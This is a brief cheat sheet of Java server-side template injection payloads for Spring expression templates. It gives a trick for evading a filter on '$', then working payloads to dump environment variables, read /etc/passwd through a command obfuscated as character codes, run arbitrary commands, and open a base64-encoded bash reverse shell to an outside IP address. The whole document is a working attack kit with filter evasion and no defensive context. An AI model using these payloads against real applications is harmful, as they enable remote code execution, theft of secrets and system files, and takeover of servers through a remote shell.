-
Typically java ssti payloads start with
$
. But if that character is banned you can use*
instead of that. -
Get env vars
*{T(java.lang.System).getenv()}
- Read files (
/etc/passwd
)
*{T(org.apache.commons.io.IOUtils).toString(T(java.lang.Runtime).getRuntime().exec(T(java.lang.Character).toString(99).concat(T(java.lang.Character).toString(97)).concat(T(java.lang.Character).toString(116)).concat(T(java.lang.Character).toString(32)).concat(T(java.lang.Character).toString(47)).concat(T(java.lang.Character).toString(101)).concat(T(java.lang.Character).toString(116)).concat(T(java.lang.Character).toString(99)).concat(T(java.lang.Character).toString(47)).concat(T(java.lang.Character).toString(112)).concat(T(java.lang.Character).toString(97)).concat(T(java.lang.Character).toString(115)).concat(T(java.lang.Character).toString(115)).concat(T(java.lang.Character).toString(119)).concat(T(java.lang.Character).toString(100))).getInputStream())}
- Execute comamnds
*{T(java.lang.Runtime).getRuntime().exec('cat etc/passwd')}
- Get a shell (base64 encoded reverse shell)
*{new java.util.Scanner(T(java.lang.Runtime).getRuntime().exec("bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4xMC4xNC4xMDEvNDQzIDA+JjE=}|{base64,-d}|{bash,-i}").getInputStream()).next()}